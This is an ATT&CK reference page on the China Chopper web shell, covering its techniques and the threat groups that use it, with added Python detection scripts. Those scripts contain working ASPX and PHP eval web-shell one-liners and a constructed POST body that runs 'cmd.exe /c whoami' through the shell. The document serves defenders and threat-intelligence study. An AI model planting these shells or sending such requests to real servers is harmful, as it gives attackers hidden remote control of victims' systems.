China Chopper, Software S0020 | MITRE ATT&CK®
China Chopper
China Chopper is a web shell hosted on compromised web servers that gives an attacker a way back into an enterprise network without relying on an infected system calling out to a remote command and control server: the attacker's client connects inbound to the shell over ordinary HTTP. [1] It has been used by several threat groups. [2] [3] [4] [5]
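Because the shell itself is a tiny script file sitting in the web root, the first place to look for it is on disk. As an added example (not code from the ATT&CK page or from FireEye), the Python below walks a web root and matches the stock ASPX and PHP one-liners that the FireEye analysis [1] documented; the directory layout, the sample files and the script extension list are constructed here for the demonstration and are assumptions, not a capture from a real incident.

```python
"""Scan a web root for China Chopper style one-line web shells.

Added example, not code from the ATT&CK page or from FireEye: the two
server-side one-liners matched below are the ASPX and PHP shells documented
in the FireEye analysis [1]; the directory layout and sample files are
constructed here purely for demonstration.
"""
import re
import tempfile
from pathlib import Path

# Signature name -> regex over raw file bytes. The ASPX shell evals a request
# item named by the shell's password; the PHP shell evals a POST parameter.
# Whitespace and quote variations are tolerated, but encoded or split
# variants are not: treat a clean scan as absence of this exact family only.
SIGNATURES = [
    ("aspx_eval_request", re.compile(
        rb'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
        re.I)),
    ("php_eval_post", re.compile(
        rb'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*["\']?[^"\'\]]+["\']?\s*\]\s*\)',
        re.I)),
]
# Assumed set of server-side script extensions worth reading.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".php"}


def scan_file(path: Path) -> list[str]:
    """Return the signature names matched in one file (empty list if clean)."""
    try:
        data = path.read_bytes()
    except OSError:
        return []
    return [name for name, rx in SIGNATURES if rx.search(data)]


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Walk root recursively; map relative path -> matched signatures for each hit."""
    hits: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTENSIONS:
            matched = scan_file(path)
            if matched:
                hits[path.relative_to(root).as_posix()] = matched
    return hits


def build_sample_webroot() -> Path:
    """Write a constructed web root: one ASPX shell, one PHP shell, two benign pages."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "aspnet_client").mkdir()
    (root / "aspnet_client" / "error.aspx").write_bytes(
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>')
    (root / "img").mkdir()
    (root / "img" / "up.php").write_bytes(b"<?php @eval($_POST['password']);?>")
    (root / "default.aspx").write_bytes(
        b'<%@ Page Language="C#" %><html><body>Hello</body></html>')
    (root / "index.php").write_bytes(
        b"<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>")
    return root


if __name__ == "__main__":
    for rel, sigs in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{rel}: {', '.join(sigs)}")
```

A signature scan like this only finds the stock family; operators routinely rename the parameter, split the eval across lines or encode it, so pair it with a file integrity baseline of the web root and a review of which script files the web server process has written. Do not rely on file modification times for triage, since the page lists timestomping (T1070.006) among the shell's capabilities.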
ID: S0020
Type: MALWARE
Platforms: Windows
Version: 2.5
Created: 31 May 2017
Last Modified: 03 January 2024
Techniques Used

Domain | ID | Name | Use
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | China Chopper's server component executes code sent via HTTP POST commands. [3]
Enterprise | T1110.001 | Brute Force: Password Guessing | China Chopper's server component can perform brute force password guessing against authentication portals. [3]
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | China Chopper's server component is capable of opening a command terminal. [6] [1] [7]
Enterprise | T1005 | Data from Local System | China Chopper's server component can upload local files. [3] [1] [7] [5]
Enterprise | T1083 | File and Directory Discovery | China Chopper's server component can list directory contents. [3] [5]
Enterprise | T1070.006 | Indicator Removal: Timestomp | China Chopper's server component can change the timestamp of files. [3] [1] [7]
Enterprise | T1105 | Ingress Tool Transfer | China Chopper's server component can download remote files. [3] [1] [7] [5] [8]
Enterprise | T1046 | Network Service Discovery | China Chopper's server component can spider authentication portals. [3]
Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | China Chopper's client component is packed with UPX. [1]
Enterprise | T1505.003 | Server Software Component: Web Shell | China Chopper's server component is a Web Shell payload. [1]
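Every capability in the table above rides on the one mechanism in T1071.001: the client POSTs code and the server-side shell evals it, so the request body is where the actual command lives. As an added example, not code from the ATT&CK page or from any of the cited reports, the Python below parses a form-encoded POST body in the ASPX wrapper shape FireEye described in [1] (a base64 payload inside an eval() whose output is bracketed by the "->|" and "|<-" markers), decodes the payload and flags shell-spawning strings. The parameter name, the JScript inside the payload, the benign comparison request and the suspicious-string list are all constructed assumptions for the demonstration, not captured traffic.

```python
"""Decode a China Chopper style HTTP POST body and flag its indicators.

Added example, not code from the ATT&CK page or from any vendor report. The
request shape follows what FireEye documented in [1]: the client sends the
shell's password as the parameter name, wraps a base64-encoded payload in a
JScript eval(), and brackets output with the "->|" and "|<-" markers. The
parameter name, the JScript inside the payload, and the benign comparison
request are constructed here and are assumptions, not captured traffic.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long base64 candidates
MARKERS = ("->|", "|<-")                             # output delimiters from [1]
WRAPPER_DECODERS = ("FromBase64String", "base64_decode")
# Assumed list of strings that commonly appear when a payload spawns a shell.
SUSPICIOUS = ("cmd.exe", "cmd /c", "powershell", "whoami", "net user", "Process.Start")


def decode_base64_runs(text: str) -> list[str]:
    """Return every base64 run in text that decodes to printable UTF-8 text."""
    found = []
    for run in B64_RUN.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            found.append(decoded)
    return found


def analyze_post_body(body: str) -> dict:
    """Parse a form-encoded body and report China Chopper indicators."""
    params = parse_qs(body, keep_blank_values=True)
    report = {"params": sorted(params), "has_markers": False,
              "eval_wrapper": False, "decoded": [], "suspicious": []}
    for values in params.values():
        for value in values:
            if all(marker in value for marker in MARKERS):
                report["has_markers"] = True
            if re.search(r"\beval\s*\(", value) and any(d in value for d in WRAPPER_DECODERS):
                report["eval_wrapper"] = True
            for decoded in decode_base64_runs(value):
                report["decoded"].append(decoded)
                report["suspicious"].extend(
                    term for term in SUSPICIOUS if term.lower() in decoded.lower())
    return report


# Constructed payload: JScript that runs `cmd.exe /c whoami` and echoes the output.
SAMPLE_INNER = ('var p=new System.Diagnostics.Process();'
                'p.StartInfo.FileName="cmd.exe";p.StartInfo.Arguments="/c whoami";'
                'p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;'
                'p.Start();Response.Write(p.StandardOutput.ReadToEnd());')


def build_sample_request(password: str = "password") -> str:
    """Constructed client request body in the ASPX wrapper shape from [1]."""
    payload = base64.b64encode(SAMPLE_INNER.encode()).decode()
    wrapper = ('Response.Write("->|");var err:Exception;try{'
               'eval(System.Text.Encoding.GetEncoding(65001).GetString('
               'System.Convert.FromBase64String("' + payload + '")),"unsafe");}'
               'catch(err){Response.Write("ERROR:// "+err.message);}'
               'Response.Write("|<-");Response.End();')
    return urlencode({password: wrapper})


if __name__ == "__main__":
    for body in (build_sample_request(), "username=alice&password=hunter2"):
        print(analyze_post_body(body))
```

This only works where the request body is visible: a reverse proxy or WAF log, a TLS-terminating inspection point, or IIS Failed Request Tracing. Standard W3C web logs carry the URL but not the body, so there the pivot is on POST requests to a script file that was never served before, with no referer, from a client that fetches none of the site's normal static assets.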
Groups That Use This Software

ID | Name | Use / References
G0093 | GALLIUM | [9] [10]
G0135 | BackdoorDiplomacy | [11]
G0117 | Fox Kitten | [12]
G0027 | Threat Group-3390 | [2] [6] [13] [14]
G0096 | APT41 | APT41 used the China Chopper web shell as a persistence mechanism on compromised Microsoft Exchange servers. [15] [16]
G1022 | ToddyCat | [8]
G0125 | HAFNIUM | [17] [18] [5]
G0065 | Leviathan | [3] [4] [19]
G0129 | Mustang Panda | Mustang Panda has used China Chopper web shells to maintain access to victims' environments. [20]
References
[1] Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
[2] Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
[3] FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
[4] CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China's MSS Hainan State Security Department. Retrieved August 12, 2021.
[5] Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.
[6] Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
[7] The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
[8] Dedola, G. (2022, June 21). APT ToddyCat. Retrieved January 3, 2024.
[9] Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
[10] MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.
[11] Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021.
[12] CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
[13] Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.
[14] Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
[15] DCSO CyTec Blog. (2022, December 24). APT41 — The spy who failed to encrypt me. Retrieved June 13, 2024.
[16] Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.
[17] Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
[18] Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.
[19] Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
[20] Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.